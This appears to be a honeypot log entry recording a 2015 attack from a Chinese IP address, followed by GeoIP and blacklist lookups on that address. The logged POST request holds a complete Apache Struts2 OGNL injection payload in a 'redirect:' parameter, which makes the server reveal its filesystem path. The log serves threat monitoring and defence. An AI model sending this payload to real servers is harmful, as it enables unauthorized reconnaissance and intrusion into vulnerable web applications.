61.186.245.211 - com.opensymphony.xwork2

BEGIN OF HTTP DATA:
2015-10-09 20:30:25
Source IP: 61.186.245.211
Country: CN RiskScore: 1 Malware: []
POST /getNews.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: 195.169.125.87
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive

redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}
 END OF DATA

61.186.245[.]211

Static Source: GeoIP data
• Country: China
• ASN: AS4134 Chinanet

Dynamic Source: SANS Internet Storm Cast
• comment:IP is listed on SANS ISC
• comment:This entry alone does not indicate a threat, please check the link
• Reference: https://isc.sans.edu/api/ip/61.186.245.211

Static Source: panwdbl.appspot.com
• Comment: Listed in open blacklist
• Reference: https://panwdbl.appspot.com/lists/openbl.txt

Static Source: http://sendmespamids.blogspot.nl/ Blacklist
• Comment: Listed on Honeypot blacklist
• Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt